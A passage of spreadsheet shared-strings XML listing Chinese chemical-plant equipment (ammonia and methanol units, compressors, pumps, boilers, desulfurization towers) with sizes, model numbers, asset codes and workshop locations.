    <t>气氨加温器</t>
  </si>
  <si>
    <t>Φ800*1200</t>
  </si>
  <si>
    <t>Φ800*3000</t>
  </si>
  <si>
    <t>合成</t>
  </si>
  <si>
    <t>装车臂</t>
  </si>
  <si>
    <t>液氨储槽</t>
  </si>
  <si>
    <t>100m3</t>
  </si>
  <si>
    <t>增压泵</t>
  </si>
  <si>
    <t>YAB25-5</t>
  </si>
  <si>
    <t>淄博</t>
  </si>
  <si>
    <t>Φ800*2000</t>
  </si>
  <si>
    <t>1.6米合成</t>
  </si>
  <si>
    <t>600*1500</t>
  </si>
  <si>
    <t>补充气氨冷器</t>
  </si>
  <si>
    <t>13m3</t>
  </si>
  <si>
    <t>1.2米合成</t>
  </si>
  <si>
    <t>Φ600*1500</t>
  </si>
  <si>
    <t>手动5T</t>
  </si>
  <si>
    <t>塔预热器</t>
  </si>
  <si>
    <t>Φ600*6000</t>
  </si>
  <si>
    <t>阀门</t>
  </si>
  <si>
    <t>Φ200</t>
  </si>
  <si>
    <t>Φ100</t>
  </si>
  <si>
    <t>铜泵机头</t>
  </si>
  <si>
    <t>循环机油轴</t>
  </si>
  <si>
    <t>Φ500*3000</t>
  </si>
  <si>
    <t>混合塔</t>
  </si>
  <si>
    <t>Φ600*7000</t>
  </si>
  <si>
    <t>集油罐</t>
  </si>
  <si>
    <t>Φ89*8  3组</t>
  </si>
  <si>
    <t>氨压缩机</t>
  </si>
  <si>
    <t>VW-4.2/10.2-0.5-3</t>
  </si>
  <si>
    <t>蚌埠</t>
  </si>
  <si>
    <t>低压氢回收装置</t>
  </si>
  <si>
    <t>Φ500*2500</t>
  </si>
  <si>
    <t>氨回收水槽</t>
  </si>
  <si>
    <t>压缩</t>
  </si>
  <si>
    <t>三入水分</t>
  </si>
  <si>
    <t>Φ2000*12*4500</t>
  </si>
  <si>
    <t>148m2</t>
  </si>
  <si>
    <t>油冷排</t>
  </si>
  <si>
    <t>4m  4组</t>
  </si>
  <si>
    <t>储油罐</t>
  </si>
  <si>
    <t>Φ2000*2600</t>
  </si>
  <si>
    <t>Φ1200*3000</t>
  </si>
  <si>
    <t>Φ800*6000</t>
  </si>
  <si>
    <t>集油器</t>
  </si>
  <si>
    <t>Φ1600*12000</t>
  </si>
  <si>
    <t>Φ1000*3500</t>
  </si>
  <si>
    <t>放空气回收罐</t>
  </si>
  <si>
    <t>Φ1000*2000</t>
  </si>
  <si>
    <t>澳化锂冷凝器</t>
  </si>
  <si>
    <t>油罐</t>
  </si>
  <si>
    <t>Φ1000*1200</t>
  </si>
  <si>
    <t>填料气回收罐</t>
  </si>
  <si>
    <t>填料放空轴流风机</t>
  </si>
  <si>
    <t>B4-72</t>
  </si>
  <si>
    <t>二段活塞</t>
  </si>
  <si>
    <t>A型氮氢气压缩机</t>
  </si>
  <si>
    <t>M-73/314</t>
  </si>
  <si>
    <t>7473*3953*1319</t>
  </si>
  <si>
    <t>同步电动机</t>
  </si>
  <si>
    <t>1250KW</t>
  </si>
  <si>
    <t>江西</t>
  </si>
  <si>
    <t>压缩机曲轴</t>
  </si>
  <si>
    <t>M16</t>
  </si>
  <si>
    <t>工段活塞</t>
  </si>
  <si>
    <t>十字头</t>
  </si>
  <si>
    <t>一段活塞带连杆</t>
  </si>
  <si>
    <t>活塞杆</t>
  </si>
  <si>
    <t>300*16000</t>
  </si>
  <si>
    <t>Φ2000*12*8000</t>
  </si>
  <si>
    <t>M92压缩</t>
  </si>
  <si>
    <t>Φ1200*2000</t>
  </si>
  <si>
    <t>填料供水装置</t>
  </si>
  <si>
    <t>板冷2个、管道泵3台、过滤器1台</t>
  </si>
  <si>
    <t>四段冷凝器</t>
  </si>
  <si>
    <t>300*5000</t>
  </si>
  <si>
    <t>一段套管冷排</t>
  </si>
  <si>
    <t>外108内89长5m</t>
  </si>
  <si>
    <t>组</t>
  </si>
  <si>
    <t>三段冷凝器</t>
  </si>
  <si>
    <t>Φ700*5000</t>
  </si>
  <si>
    <t>一段油分</t>
  </si>
  <si>
    <t>水过滤器</t>
  </si>
  <si>
    <t>Φ400*1200</t>
  </si>
  <si>
    <t>六段压缩机中间节</t>
  </si>
  <si>
    <t>填料回气罐</t>
  </si>
  <si>
    <t>Φ400*1800</t>
  </si>
  <si>
    <t>油泵系统</t>
  </si>
  <si>
    <t>100m2</t>
  </si>
  <si>
    <t>Φ800*5000</t>
  </si>
  <si>
    <t>Φ300*5000</t>
  </si>
  <si>
    <t>Φ1200*3500</t>
  </si>
  <si>
    <t>五段套管冷排</t>
  </si>
  <si>
    <t>内108外150 5M*13根</t>
  </si>
  <si>
    <t>油冷凝器</t>
  </si>
  <si>
    <t>Φ600*3000</t>
  </si>
  <si>
    <t>内89外133 6M*24根*6组</t>
  </si>
  <si>
    <t>五段活塞杆</t>
  </si>
  <si>
    <t>一段活塞</t>
  </si>
  <si>
    <t>五六段活塞杆</t>
  </si>
  <si>
    <t>二段活塞带杆</t>
  </si>
  <si>
    <t>一段活塞带杆</t>
  </si>
  <si>
    <t>一段活塞连杆</t>
  </si>
  <si>
    <t>三段活塞带杆</t>
  </si>
  <si>
    <t>三段活塞</t>
  </si>
  <si>
    <t>五段缸体</t>
  </si>
  <si>
    <t>六段活塞</t>
  </si>
  <si>
    <t>中间节</t>
  </si>
  <si>
    <t>连杆</t>
  </si>
  <si>
    <t>五六段填料压盖</t>
  </si>
  <si>
    <t>洗气塔</t>
  </si>
  <si>
    <t>Φ3000*13000</t>
  </si>
  <si>
    <t>DN350</t>
  </si>
  <si>
    <t>钢管</t>
  </si>
  <si>
    <t>Φ300</t>
  </si>
  <si>
    <t>米</t>
  </si>
  <si>
    <t>M306连杆</t>
  </si>
  <si>
    <t>三段活塞结杆</t>
  </si>
  <si>
    <t>一段活塞杆</t>
  </si>
  <si>
    <t>二段缸体</t>
  </si>
  <si>
    <t>洗油站油泵</t>
  </si>
  <si>
    <t>四段活塞带杆</t>
  </si>
  <si>
    <t>四段活塞</t>
  </si>
  <si>
    <t>00431</t>
  </si>
  <si>
    <t>精练油分(醇洗塔)</t>
  </si>
  <si>
    <t>φ1200甲醇</t>
  </si>
  <si>
    <t>00459</t>
  </si>
  <si>
    <t>碱液制备槽</t>
  </si>
  <si>
    <t>直径1600*1680</t>
  </si>
  <si>
    <t>甲醇车间 精馏</t>
  </si>
  <si>
    <t>00460</t>
  </si>
  <si>
    <t>扬碱器</t>
  </si>
  <si>
    <t>直径1600*2870</t>
  </si>
  <si>
    <t>甲醇车间  精馏</t>
  </si>
  <si>
    <t>00463</t>
  </si>
  <si>
    <t>直径2200*8530</t>
  </si>
  <si>
    <t>00464</t>
  </si>
  <si>
    <t>油水槽</t>
  </si>
  <si>
    <t>00465</t>
  </si>
  <si>
    <t>直径1600*1800</t>
  </si>
  <si>
    <t>00470</t>
  </si>
  <si>
    <t>高压铜液泵</t>
  </si>
  <si>
    <t>67/150</t>
  </si>
  <si>
    <t>甲醇车间　φ800甲醇</t>
  </si>
  <si>
    <t>00471</t>
  </si>
  <si>
    <t>直径800*14902</t>
  </si>
  <si>
    <t>甲醇车间 φ800甲醇</t>
  </si>
  <si>
    <t>00473</t>
  </si>
  <si>
    <t>甲醇分离器</t>
  </si>
  <si>
    <t>直径700</t>
  </si>
  <si>
    <t>00474</t>
  </si>
  <si>
    <t>φ700</t>
  </si>
  <si>
    <t>00475</t>
  </si>
  <si>
    <t>中间贮槽</t>
  </si>
  <si>
    <t>直径1300*4754</t>
  </si>
  <si>
    <t>00476</t>
  </si>
  <si>
    <t>稀醇槽</t>
  </si>
  <si>
    <t>直径1200*3738</t>
  </si>
  <si>
    <t>00477</t>
  </si>
  <si>
    <t>解析槽</t>
  </si>
  <si>
    <t>00478</t>
  </si>
  <si>
    <t>φ5300×10×1756</t>
  </si>
  <si>
    <t>00479</t>
  </si>
  <si>
    <t>精醇罐</t>
  </si>
  <si>
    <t>φ2200×5000</t>
  </si>
  <si>
    <t>00570</t>
  </si>
  <si>
    <t>精馏塔</t>
  </si>
  <si>
    <t>φ2000×12×45590</t>
  </si>
  <si>
    <t>00571</t>
  </si>
  <si>
    <t>水泵(粗醇泵)</t>
  </si>
  <si>
    <t>50FB-40</t>
  </si>
  <si>
    <t>00572</t>
  </si>
  <si>
    <t>水泵(主塔入料泵)</t>
  </si>
  <si>
    <t>65FB-40</t>
  </si>
  <si>
    <t>00573</t>
  </si>
  <si>
    <t>水泵(预塔回流泵)</t>
  </si>
  <si>
    <t>40FB-40</t>
  </si>
  <si>
    <t>00574</t>
  </si>
  <si>
    <t>水泵(主塔回流泵)</t>
  </si>
  <si>
    <t>IS65-40-200</t>
  </si>
  <si>
    <t>00575</t>
  </si>
  <si>
    <t>水泵(稀醇泵)</t>
  </si>
  <si>
    <t>IS50-32-200</t>
  </si>
  <si>
    <t>00576</t>
  </si>
  <si>
    <t>水泵(冷凝液泵)</t>
  </si>
  <si>
    <t>IS65-50-160</t>
  </si>
  <si>
    <t>00577</t>
  </si>
  <si>
    <t>水泵(碱液泵)</t>
  </si>
  <si>
    <t>IS-50-32-250</t>
  </si>
  <si>
    <t>00579</t>
  </si>
  <si>
    <t>脱醚塔</t>
  </si>
  <si>
    <t>1200*34235</t>
  </si>
  <si>
    <t>00588</t>
  </si>
  <si>
    <t>DEW-6.0、115-135</t>
  </si>
  <si>
    <t>甲醇车间 φ1200甲醇</t>
  </si>
  <si>
    <t>00589</t>
  </si>
  <si>
    <t>DEW-5.0、115-135</t>
  </si>
  <si>
    <t>00590</t>
  </si>
  <si>
    <t>甲醇塔外筒</t>
  </si>
  <si>
    <t>φ1205</t>
  </si>
  <si>
    <t>00591</t>
  </si>
  <si>
    <t>分离器(φ1200醇分)</t>
  </si>
  <si>
    <t>φ1005×54×7300</t>
  </si>
  <si>
    <t>00592</t>
  </si>
  <si>
    <t>洗涤塔(醇洗塔)</t>
  </si>
  <si>
    <t>φ1005×54×9455</t>
  </si>
  <si>
    <t>00616</t>
  </si>
  <si>
    <t>3DI-SZ48-16</t>
  </si>
  <si>
    <t>00620</t>
  </si>
  <si>
    <t>HBQ0.48 F=50m2</t>
  </si>
  <si>
    <t>00626</t>
  </si>
  <si>
    <t>甲醇中间贮槽</t>
  </si>
  <si>
    <t>甲醇车间φ800甲醇</t>
  </si>
  <si>
    <t>00628</t>
  </si>
  <si>
    <t>甲醇储槽</t>
  </si>
  <si>
    <t>500立方</t>
  </si>
  <si>
    <t>甲醇车间 南库区</t>
  </si>
  <si>
    <t>00638</t>
  </si>
  <si>
    <t>甲醇合成塔内件</t>
  </si>
  <si>
    <t>Q1200</t>
  </si>
  <si>
    <t>00639</t>
  </si>
  <si>
    <t>主塔预热器</t>
  </si>
  <si>
    <t>F=130m2</t>
  </si>
  <si>
    <t>00641</t>
  </si>
  <si>
    <t>异丁基油冷却器</t>
  </si>
  <si>
    <t>20m2</t>
  </si>
  <si>
    <t>00912</t>
  </si>
  <si>
    <t>18.5*2</t>
  </si>
  <si>
    <t>00968</t>
  </si>
  <si>
    <t>醇化塔外壳</t>
  </si>
  <si>
    <t>DN1400</t>
  </si>
  <si>
    <t>00969</t>
  </si>
  <si>
    <t>醇分离器外壳</t>
  </si>
  <si>
    <t>DN1010×7832×66</t>
  </si>
  <si>
    <t>00970</t>
  </si>
  <si>
    <t>醇化预热器外壳</t>
  </si>
  <si>
    <t>DN805</t>
  </si>
  <si>
    <t>00975</t>
  </si>
  <si>
    <t>甲醇冷排</t>
  </si>
  <si>
    <t>F250平方</t>
  </si>
  <si>
    <t>00978</t>
  </si>
  <si>
    <t>DZW-6.0/115-135</t>
  </si>
  <si>
    <t>01024</t>
  </si>
  <si>
    <t>800 DN1400</t>
  </si>
  <si>
    <t>01025</t>
  </si>
  <si>
    <t>醇化分离器内件</t>
  </si>
  <si>
    <t>1000</t>
  </si>
  <si>
    <t>01026</t>
  </si>
  <si>
    <t>醇化油分离器</t>
  </si>
  <si>
    <t>φ705</t>
  </si>
  <si>
    <t>01027</t>
  </si>
  <si>
    <t>醇化塔外热交内件</t>
  </si>
  <si>
    <t>01028</t>
  </si>
  <si>
    <t>醇化废热锅炉</t>
  </si>
  <si>
    <t>01062</t>
  </si>
  <si>
    <t>醇化塔内件</t>
  </si>
  <si>
    <t>01099</t>
  </si>
  <si>
    <t>终端废水处理工程</t>
  </si>
  <si>
    <t>2180立方米</t>
  </si>
  <si>
    <t>01247</t>
  </si>
  <si>
    <t>净醇洗涤塔</t>
  </si>
  <si>
    <t>DN1000 DN1005×60×16720</t>
  </si>
  <si>
    <t>01262</t>
  </si>
  <si>
    <t>50HB-40</t>
  </si>
  <si>
    <t>01263</t>
  </si>
  <si>
    <t>离心泵(精醇泵)</t>
  </si>
  <si>
    <t>01315</t>
  </si>
  <si>
    <t>板式换热器(主塔换热器)</t>
  </si>
  <si>
    <t>F=270m2</t>
  </si>
  <si>
    <t>2008.01.28</t>
  </si>
  <si>
    <t>01366</t>
  </si>
  <si>
    <t>甲醇分离器(水分)</t>
  </si>
  <si>
    <t>φ1005×54×7286</t>
  </si>
  <si>
    <t>01392</t>
  </si>
  <si>
    <t>甲醇主塔再沸器</t>
  </si>
  <si>
    <t>F=320m2</t>
  </si>
  <si>
    <t>01393</t>
  </si>
  <si>
    <t>甲醇预塔再沸器</t>
  </si>
  <si>
    <t>F=180m2</t>
  </si>
  <si>
    <t>01397</t>
  </si>
  <si>
    <t>DN1400醇合成塔(醇洗内件)</t>
  </si>
  <si>
    <t>DN1400 DN1000</t>
  </si>
  <si>
    <t>01456</t>
  </si>
  <si>
    <t>3DP-35</t>
  </si>
  <si>
    <t>01479</t>
  </si>
  <si>
    <t>甲醇水冷排</t>
  </si>
  <si>
    <t>Φ68*10 185平米</t>
  </si>
  <si>
    <t>01735</t>
  </si>
  <si>
    <t>氨氮在线分析仪</t>
  </si>
  <si>
    <t>HB2000</t>
  </si>
  <si>
    <t>2012.02.23</t>
  </si>
  <si>
    <t>01909</t>
  </si>
  <si>
    <t>FBLZ-5800</t>
  </si>
  <si>
    <t>甲醇车间DN1400合成岗位</t>
  </si>
  <si>
    <t>01935</t>
  </si>
  <si>
    <t>AD1402汽车装卸臂</t>
  </si>
  <si>
    <t>AD1402</t>
  </si>
  <si>
    <t>甲醇岗位</t>
  </si>
  <si>
    <t>Φ800*14902</t>
  </si>
  <si>
    <t>高压水洗塔</t>
  </si>
  <si>
    <t>Φ800*42*19224</t>
  </si>
  <si>
    <t>2.3型</t>
  </si>
  <si>
    <t>2.8型</t>
  </si>
  <si>
    <t>水槽</t>
  </si>
  <si>
    <t>Φ1*1.5</t>
  </si>
  <si>
    <t>污水槽</t>
  </si>
  <si>
    <t>Φ4*7</t>
  </si>
  <si>
    <t>Φ2*4</t>
  </si>
  <si>
    <t>组合式加药装置</t>
  </si>
  <si>
    <t>徐州市</t>
  </si>
  <si>
    <t>Φ2000*5240</t>
  </si>
  <si>
    <t>精醇泵</t>
  </si>
  <si>
    <t>采暖回水槽</t>
  </si>
  <si>
    <t>Φ1*2.3</t>
  </si>
  <si>
    <t>采暖加热槽</t>
  </si>
  <si>
    <t>Φ1.4*4</t>
  </si>
  <si>
    <t>供水分支站</t>
  </si>
  <si>
    <t>Φ0.6*3</t>
  </si>
  <si>
    <t>采暖泵</t>
  </si>
  <si>
    <t>卧式单吸离心泵</t>
  </si>
  <si>
    <t>40m2</t>
  </si>
  <si>
    <t>稀醇泵</t>
  </si>
  <si>
    <t>25m2</t>
  </si>
  <si>
    <t>软水槽</t>
  </si>
  <si>
    <t>Φ1.2*3.933</t>
  </si>
  <si>
    <t>驰放气回收槽</t>
  </si>
  <si>
    <t>Φ1600*10*6300</t>
  </si>
  <si>
    <t>粗醇槽</t>
  </si>
  <si>
    <t>Φ4500*4700</t>
  </si>
  <si>
    <t>Φ4000*6000</t>
  </si>
  <si>
    <t>F=250m2</t>
  </si>
  <si>
    <t>预塔液封槽</t>
  </si>
  <si>
    <t>Φ1000*2015</t>
  </si>
  <si>
    <t>主塔液封槽</t>
  </si>
  <si>
    <t>主塔过滤器</t>
  </si>
  <si>
    <t>Φ600*1.5</t>
  </si>
  <si>
    <t>预塔过滤器</t>
  </si>
  <si>
    <t>稀释槽</t>
  </si>
  <si>
    <t>Φ3000*3200</t>
  </si>
  <si>
    <t>可耐特</t>
  </si>
  <si>
    <t>残液排放槽</t>
  </si>
  <si>
    <t>Φ2000*3500</t>
  </si>
  <si>
    <t>Φ1920*5*3500</t>
  </si>
  <si>
    <t>Φ2000*5000</t>
  </si>
  <si>
    <t>预回流槽</t>
  </si>
  <si>
    <t>Φ1600*5000</t>
  </si>
  <si>
    <t>主回流槽</t>
  </si>
  <si>
    <t>残液泵</t>
  </si>
  <si>
    <t>2R65-40-250</t>
  </si>
  <si>
    <t>钢构平台</t>
  </si>
  <si>
    <t>12*12  H=4m</t>
  </si>
  <si>
    <t>无锡</t>
  </si>
  <si>
    <t>Φ1600*2600</t>
  </si>
  <si>
    <t>Φ2200*3600</t>
  </si>
  <si>
    <t>甲醇槽</t>
  </si>
  <si>
    <t>300m3</t>
  </si>
  <si>
    <t>二硫化碳罐</t>
  </si>
  <si>
    <t>Φ1500*3000</t>
  </si>
  <si>
    <t>在线化学需氧量分析仪</t>
  </si>
  <si>
    <t>HBCOP-1型</t>
  </si>
  <si>
    <t>北京环科</t>
  </si>
  <si>
    <t>00615</t>
  </si>
  <si>
    <t>抓泥机'3T18M</t>
  </si>
  <si>
    <t>CD型</t>
  </si>
  <si>
    <t>水汽车间污水处理岗位</t>
  </si>
  <si>
    <t>00623</t>
  </si>
  <si>
    <t>锤式破碎机</t>
  </si>
  <si>
    <t>00637</t>
  </si>
  <si>
    <t>沸腾炉</t>
  </si>
  <si>
    <t>8T/H</t>
  </si>
  <si>
    <t>锅炉</t>
  </si>
  <si>
    <t>00693</t>
  </si>
  <si>
    <t>震动筛</t>
  </si>
  <si>
    <t>2YTG1020型</t>
  </si>
  <si>
    <t>00698</t>
  </si>
  <si>
    <t>水汽车间脱硫岗位</t>
  </si>
  <si>
    <t>00709</t>
  </si>
  <si>
    <t>电动葫芦</t>
  </si>
  <si>
    <t>水汽车间造气岗位</t>
  </si>
  <si>
    <t>00712</t>
  </si>
  <si>
    <t>煤气炉</t>
  </si>
  <si>
    <t>2610</t>
  </si>
  <si>
    <t>00716</t>
  </si>
  <si>
    <t>1600*3620</t>
  </si>
  <si>
    <t>00749</t>
  </si>
  <si>
    <t>仪表柜</t>
  </si>
  <si>
    <t>80KVA</t>
  </si>
  <si>
    <t>00837</t>
  </si>
  <si>
    <t>JC-3</t>
  </si>
  <si>
    <t>00862</t>
  </si>
  <si>
    <t>ARH700 691/49</t>
  </si>
  <si>
    <t>00917</t>
  </si>
  <si>
    <t>吸泥机</t>
  </si>
  <si>
    <t>00926</t>
  </si>
  <si>
    <t>电动滚筒</t>
  </si>
  <si>
    <t>6550-7.5-1.0</t>
  </si>
  <si>
    <t>00927</t>
  </si>
  <si>
    <t>5032-3-1.25</t>
  </si>
  <si>
    <t>00953</t>
  </si>
  <si>
    <t>4-72-6C</t>
  </si>
  <si>
    <t>00959</t>
  </si>
  <si>
    <t>Y9-38-10D</t>
  </si>
  <si>
    <t>6.5吨</t>
  </si>
  <si>
    <t>00960</t>
  </si>
  <si>
    <t>2YTG1020</t>
  </si>
  <si>
    <t>00966</t>
  </si>
  <si>
    <t>旋风除尘器</t>
  </si>
  <si>
    <t>2000*7700</t>
  </si>
  <si>
    <t>00967</t>
  </si>
  <si>
    <t>热管上下行余热回收器</t>
  </si>
  <si>
    <t>1300</t>
  </si>
  <si>
    <t>01005</t>
  </si>
  <si>
    <t>旋膜除氧器</t>
  </si>
  <si>
    <t>DCM-70/35-25</t>
  </si>
  <si>
    <t>01006</t>
  </si>
  <si>
    <t>5.5KW</t>
  </si>
  <si>
    <t>01009</t>
  </si>
  <si>
    <t>余热回收器</t>
  </si>
  <si>
    <t>01011</t>
  </si>
  <si>
    <t>JLG35-22AN.0112D</t>
  </si>
  <si>
    <t>50吨</t>
  </si>
  <si>
    <t>01012</t>
  </si>
  <si>
    <t>JLG75-SI-18N.014-50</t>
  </si>
  <si>
    <t>01014</t>
  </si>
  <si>
    <t>JLYBO-11.2ANO21.8D</t>
  </si>
  <si>
    <t>01018</t>
  </si>
  <si>
    <t>斗式提升机</t>
  </si>
  <si>
    <t>HL400</t>
  </si>
  <si>
    <t>01019</t>
  </si>
  <si>
    <t>螺旋给煤机</t>
  </si>
  <si>
    <t>LS250</t>
  </si>
  <si>
    <t>01044</t>
  </si>
  <si>
    <t>LH型</t>
  </si>
  <si>
    <t>01053</t>
  </si>
  <si>
    <t>减压装置</t>
  </si>
  <si>
    <t>Q=61T/H</t>
  </si>
  <si>
    <t>01057</t>
  </si>
  <si>
    <t>花岗岩水膜除尘器</t>
  </si>
  <si>
    <t>01070</t>
  </si>
  <si>
    <t>KTD600(2500-2800)</t>
  </si>
  <si>
    <t>01074</t>
  </si>
  <si>
    <t>破碎机</t>
  </si>
  <si>
    <t>PCK0908</t>
  </si>
  <si>
    <t>01076</t>
  </si>
  <si>
    <t>皮带机及支架</t>
  </si>
  <si>
    <t>01079</t>
  </si>
  <si>
    <t>01082</t>
  </si>
  <si>
    <t>蒸汽缓冲罐</t>
  </si>
  <si>
    <t>2006.09.01</t>
  </si>
  <si>
    <t>01083</t>
  </si>
  <si>
    <t>大汽包</t>
  </si>
  <si>
    <t>01084</t>
  </si>
  <si>
    <t>小汽包</t>
  </si>
  <si>
    <t>01088</t>
  </si>
  <si>
    <t>Q170/950-50-382/450</t>
  </si>
  <si>
    <t>2006.09.20</t>
  </si>
  <si>
    <t>水汽车间50吨</t>
  </si>
  <si>
    <t>01089</t>
  </si>
  <si>
    <t>复合式煤气炉</t>
  </si>
  <si>
    <t>01117</t>
  </si>
  <si>
    <t>减速机</t>
  </si>
  <si>
    <t>XWTD</t>
  </si>
  <si>
    <t>水汽车间锅炉岗位</t>
  </si>
  <si>
    <t>01143</t>
  </si>
  <si>
    <t>01144</t>
  </si>
  <si>
    <t>01145</t>
  </si>
  <si>
    <t>砂泉泵</t>
  </si>
  <si>
    <t>100UHB-ZK-A-80-15/18.5</t>
  </si>
  <si>
    <t>2007.01.15</t>
  </si>
  <si>
    <t>01146</t>
  </si>
  <si>
    <t>IS-100-65-200</t>
  </si>
  <si>
    <t>01166</t>
  </si>
  <si>
    <t>HBM2-3</t>
  </si>
  <si>
    <t>01200</t>
  </si>
  <si>
    <t>KQSN200-M12/228</t>
  </si>
  <si>
    <t>01201</t>
  </si>
  <si>
    <t>3DI-SZ-65/9</t>
  </si>
  <si>
    <t>01202</t>
  </si>
  <si>
    <t>HBR0.2</t>
  </si>
  <si>
    <t>01218</t>
  </si>
  <si>
    <t>JC-V</t>
  </si>
  <si>
    <t>01251</t>
  </si>
  <si>
    <t>01260</t>
  </si>
  <si>
    <t>250S65A</t>
  </si>
  <si>
    <t>01286</t>
  </si>
  <si>
    <t>01287</t>
  </si>
  <si>
    <t>01288</t>
  </si>
  <si>
    <t>01289</t>
  </si>
  <si>
    <t>排污泵</t>
  </si>
  <si>
    <t>01290</t>
  </si>
  <si>
    <t>01292</t>
  </si>
  <si>
    <t>除渣机</t>
  </si>
  <si>
    <t>01316</t>
  </si>
  <si>
    <t>01320</t>
  </si>
  <si>
    <t>冷却塔填料</t>
  </si>
  <si>
    <t>01321</t>
  </si>
  <si>
    <t>01354</t>
  </si>
  <si>
    <t>01355</t>
  </si>
  <si>
    <t>01372</t>
  </si>
  <si>
    <t>罗茨风机配电机</t>
  </si>
  <si>
    <t>01406</t>
  </si>
  <si>
    <t>20吨</t>
  </si>
  <si>
    <t>01447</t>
  </si>
  <si>
    <t>电动隔膜计量泵</t>
  </si>
  <si>
    <t>01448</t>
  </si>
  <si>
    <t>电动慢开门</t>
  </si>
  <si>
    <t>01455</t>
  </si>
  <si>
    <t>01473</t>
  </si>
  <si>
    <t>65UHB-ZK-30-40/11</t>
  </si>
  <si>
    <t>01478</t>
  </si>
  <si>
    <t>一脱再生槽</t>
  </si>
  <si>
    <t>01481</t>
  </si>
  <si>
    <t>φ4400洗气塔</t>
  </si>
  <si>
    <t>φ4400</t>
  </si>
  <si>
    <t>01486</t>
  </si>
  <si>
    <t>φ5000脱硫洗气塔</t>
  </si>
  <si>
    <t>01521</t>
  </si>
  <si>
    <t>刮板除灰机</t>
  </si>
  <si>
    <t>BLC-4</t>
  </si>
  <si>
    <t>2009.08.26</t>
  </si>
  <si>
    <t>01528</t>
  </si>
  <si>
    <t>UHB50</t>
  </si>
  <si>
    <t>2009.09.28</t>
  </si>
  <si>
    <t>01543</t>
  </si>
  <si>
    <t>传动</t>
  </si>
  <si>
    <t>Ⅱ型</t>
  </si>
  <si>
    <t>01544</t>
  </si>
  <si>
    <t>01548</t>
  </si>
  <si>
    <t>冷渣机</t>
  </si>
  <si>
    <t>01559</t>
  </si>
  <si>
    <t>锥形水夹套总成</t>
  </si>
  <si>
    <t>2800/2610*2335</t>
  </si>
  <si>
    <t>01571</t>
  </si>
  <si>
    <t>热管上下行煤气换热器内件</t>
  </si>
  <si>
    <t>01589</t>
  </si>
  <si>
    <t>65T三废余热锅炉(包括筑炉安装)</t>
  </si>
  <si>
    <t>01593</t>
  </si>
  <si>
    <t>水夹套总成</t>
  </si>
  <si>
    <t>直径2650</t>
  </si>
  <si>
    <t>01601</t>
  </si>
  <si>
    <t>01617</t>
  </si>
  <si>
    <t>槽式初级分布器</t>
  </si>
  <si>
    <t>01618</t>
  </si>
  <si>
    <t>5000脱硫塔</t>
  </si>
  <si>
    <t>01619</t>
  </si>
  <si>
    <t>槽盘式再分布器</t>
  </si>
  <si>
    <t>01634</t>
  </si>
  <si>
    <t>空气预热器</t>
  </si>
  <si>
    <t>228Y07-0(B)</t>
  </si>
  <si>
    <t>水汽车间50T三废岗位</t>
  </si>
  <si>
    <t>01644</t>
  </si>
  <si>
    <t>复合燃烧机</t>
  </si>
  <si>
    <t>01647</t>
  </si>
  <si>
    <t>KQSN200-N9/212</t>
  </si>
  <si>
    <t>65吨三废锅炉岗位</t>
  </si>
  <si>
    <t>01648</t>
  </si>
  <si>
    <t>Y2-225M-2</t>
  </si>
  <si>
    <t>01649</t>
  </si>
  <si>
    <t>水汽车间65吨三废锅炉岗位</t>
  </si>
  <si>
    <t>01650</t>
  </si>
  <si>
    <t>01651</t>
  </si>
  <si>
    <t>锅炉给水泵\矿用泵</t>
  </si>
  <si>
    <t>DG85-67*9</t>
  </si>
  <si>
    <t>01652</t>
  </si>
  <si>
    <t>锅炉给水泵\矿用泵电机</t>
  </si>
  <si>
    <t>01671</t>
  </si>
  <si>
    <t>大气式旋膜除氧器</t>
  </si>
  <si>
    <t>DCM80/35</t>
  </si>
  <si>
    <t>水汽车间65t锅炉岗位</t>
  </si>
  <si>
    <t>01678</t>
  </si>
  <si>
    <t>造气炉鼓风机</t>
  </si>
  <si>
    <t>C600-1.28</t>
  </si>
  <si>
    <t>水汽车间西厂区造气炉岗位</t>
  </si>
  <si>
    <t>01679</t>
  </si>
  <si>
    <t>三废锅炉引风机</t>
  </si>
  <si>
    <t>Y6-51N022.5F</t>
  </si>
  <si>
    <t>65T三废锅炉岗位</t>
  </si>
  <si>
    <t>01680</t>
  </si>
  <si>
    <t>三废锅炉一次风机</t>
  </si>
  <si>
    <t>G6-31N018D</t>
  </si>
  <si>
    <t>65T三废锅炉风机岗位</t>
  </si>
  <si>
    <t>01681</t>
  </si>
  <si>
    <t>三废锅炉二次风机</t>
  </si>
  <si>
    <t>9-26N011.2D</t>
  </si>
  <si>
    <t>01684</t>
  </si>
  <si>
    <t>冷却塔风筒</t>
  </si>
  <si>
    <t>φ4700×3000</t>
  </si>
  <si>
    <t>01694</t>
  </si>
  <si>
    <t>65t三废锅炉脱硫加碱系统设备</t>
  </si>
  <si>
    <t>西厂区65t三废锅炉岗位</t>
  </si>
  <si>
    <t>01695</t>
  </si>
  <si>
    <t>手拉葫芦</t>
  </si>
  <si>
    <t>10T</t>
  </si>
  <si>
    <t>01702</t>
  </si>
  <si>
    <t>刮板捞渣机</t>
  </si>
  <si>
    <t>GBC600-7.1</t>
  </si>
  <si>
    <t>西厂区水汽车间65T三废锅炉岗位</t>
  </si>
  <si>
    <t>01703</t>
  </si>
  <si>
    <t>皮带给煤机</t>
  </si>
  <si>
    <t>TD75-500-5.5</t>
  </si>
  <si>
    <t>01899</t>
  </si>
  <si>
    <t>200UHB-ZK-A-350-20/45-4</t>
  </si>
  <si>
    <t>水汽车间污水岗位</t>
  </si>
  <si>
    <t>01900</t>
  </si>
  <si>
    <t>洗气塔(制作)</t>
  </si>
  <si>
    <t>DN4000</t>
  </si>
  <si>
    <t>水汽车间东楼及东南楼用</t>
  </si>
  <si>
    <t>01911</t>
  </si>
  <si>
    <t>罗茨风机、电机</t>
  </si>
  <si>
    <t>ARG445M 313/49</t>
  </si>
  <si>
    <t>01928</t>
  </si>
  <si>
    <t>GM0005TP</t>
  </si>
  <si>
    <t>西厂区65T锅炉岗位</t>
  </si>
  <si>
    <t>01929</t>
  </si>
  <si>
    <t>计量泵(溶解箱)</t>
  </si>
  <si>
    <t>GW025RT</t>
  </si>
  <si>
    <t>01942</t>
  </si>
  <si>
    <t>吊钩秤无线传输系统</t>
  </si>
  <si>
    <t>GPS-348</t>
  </si>
  <si>
    <t>01960</t>
  </si>
  <si>
    <t>脱硫风机辅助油泵</t>
  </si>
  <si>
    <t>01961</t>
  </si>
  <si>
    <t>50T三废锅炉井用250-80潜水泵</t>
  </si>
  <si>
    <t>01966</t>
  </si>
  <si>
    <t>刮板除渣机</t>
  </si>
  <si>
    <t>BLC-6</t>
  </si>
  <si>
